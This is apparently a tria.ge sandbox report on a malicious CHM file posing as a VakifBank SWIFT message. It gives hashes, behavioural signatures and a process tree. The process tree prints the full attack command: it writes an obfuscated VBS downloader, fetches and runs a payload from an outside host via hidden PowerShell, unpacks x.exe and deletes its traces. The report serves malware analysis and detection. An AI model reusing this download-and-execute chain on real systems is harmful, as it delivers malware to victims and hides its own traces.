Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
  max time kernel:   117s
  max time network:  118s
  platform:          windows7_x64
  resource:          win7-20240903-en
  resource tags:     arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted:         27/01/2025, 17:57
Static task
  static1

Behavioral task
  behavioral1
  Sample:    VakifBank_Swift_Mesaji.chm
  Resource:  win7-20240903-en

Behavioral task
  behavioral2
  Sample:    VakifBank_Swift_Mesaji.chm
  Resource:  win10v2004-20241007-en
General
  Target:  VakifBank_Swift_Mesaji.chm
  Size:    75KB
  MD5:     039c23eb3b3b9c7a83c8647b6fbbd029
  SHA1:    413a342f9ef90edb0fe4db38d655e6eab77a49ce
  SHA256:  3956166deff9e06982e311687fd916327c004d13af4b3fbd01fb17e93c110591
  SHA512:  4f45ff320239c81535347f66b44b57a74dc445278bc61e6fa25c48792e4fcd0d63f080d420457584c64df81d54c4198f8f84a8e331650cce874a32a0fe6c862e
  SSDEEP:  1536:PTjqBR0MKHC7+qFwItZR3BRRdos7xw9siuUKHj5Cs+0LtpZsAx+9+:7yeMKi7XpZR3BR899svd5ayt7nxf
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run PowerShell and hide display window.
  pid   Process
  2596  powershell.exe
  2044  powershell.exe

Executes dropped EXE (2 IoCs)
  pid   Process
  1864  ript.exe
  1284  x.exe

Loads dropped DLL (4 IoCs)
  pid   Process
  2596  powershell.exe
  2596  powershell.exe
  2596  powershell.exe
  2596  powershell.exe

Hide Artifacts: Hidden Window (1 TTP, 1 IoC)
Windows that would typically be displayed when an application carries out an operation can be hidden.
  pid   Process
  2576  cmd.exe

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  x.exe

Kills process with taskkill (1 IoC)
  pid   Process
  680   taskkill.exe

Modifies Internet Explorer settings
  description  ioc                                                                                                          Process
  Key created  \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main      hh.exe

Modifies system certificate store (2 TTPs, 2 IoCs)
  description       ioc                                                                                                                          Process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8          ript.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = <blob data removed>  ript.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid   Process
  1284  x.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   Process
  2596  powershell.exe
  2044  powershell.exe
  2044  powershell.exe
  2044  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2596  powershell.exe
  Token: SeDebugPrivilege  2044  powershell.exe
  Token: SeDebugPrivilege  680   taskkill.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  2788  hh.exe
  2788  hh.exe

Suspicious use of WriteProcessMemory (28 IoCs)
  description                        pid   Process         procid_target
  PID 2788 wrote to memory of 2576   2788  hh.exe          31
  PID 2788 wrote to memory of 2576   2788  hh.exe          31
  PID 2788 wrote to memory of 2576   2788  hh.exe          31
  PID 2576 wrote to memory of 2688   2576  cmd.exe         33
  PID 2576 wrote to memory of 2688   2576  cmd.exe         33
  PID 2576 wrote to memory of 2688   2576  cmd.exe         33
  PID 2576 wrote to memory of 2596   2576  cmd.exe         34
  PID 2576 wrote to memory of 2596   2576  cmd.exe         34
  PID 2576 wrote to memory of 2596   2576  cmd.exe         34
  PID 2596 wrote to memory of 1864   2596  powershell.exe  35
  PID 2596 wrote to memory of 1864   2596  powershell.exe  35
  PID 2596 wrote to memory of 1864   2596  powershell.exe  35
  PID 2576 wrote to memory of 2044   2576  cmd.exe         36
  PID 2576 wrote to memory of 2044   2576  cmd.exe         36
  PID 2576 wrote to memory of 2044   2576  cmd.exe         36
  PID 2044 wrote to memory of 2952   2044  powershell.exe  37
  PID 2044 wrote to memory of 2952   2044  powershell.exe  37
  PID 2044 wrote to memory of 2952   2044  powershell.exe  37
  PID 2576 wrote to memory of 680    2576  cmd.exe         39
  PID 2576 wrote to memory of 680    2576  cmd.exe         39
  PID 2576 wrote to memory of 680    2576  cmd.exe         39
  PID 2952 wrote to memory of 864    2952  cmd.exe         40
  PID 2952 wrote to memory of 864    2952  cmd.exe         40
  PID 2952 wrote to memory of 864    2952  cmd.exe         40
  PID 2952 wrote to memory of 1284   2952  cmd.exe         41
  PID 2952 wrote to memory of 1284   2952  cmd.exe         41
  PID 2952 wrote to memory of 1284   2952  cmd.exe         41
  PID 2952 wrote to memory of 1284   2952  cmd.exe         41
Processes (indentation shows the parent/child tree)

C:\Windows\hh.exe  (PID 2788)
  Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\VakifBank_Swift_Mesaji.chm
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 2576)
    Command line: "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
    - Hide Artifacts: Hidden Window
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe  (PID 2688)
      Command line: extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2596)
      Command line: powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd"
      - Command and Scripting Interpreter: PowerShell
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\ript.exe  (PID 1864)
        Command line: "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd
        - Executes dropped EXE
        - Modifies system certificate store

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2044)
      Command line: powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe  (PID 2952)
        Command line: cmd /c ""C:\Users\Public\df.cmd" "
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  (PID 864)
          Command line: extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"

        C:\Users\Admin\AppData\Local\Temp\x.exe  (PID 1284)
          Command line: "C:\Users\Admin\AppData\Local\Temp\x.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: CmdExeWriteProcessMemorySpam

    C:\Windows\system32\taskkill.exe  (PID 680)
      Command line: taskkill /F /IM hh.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads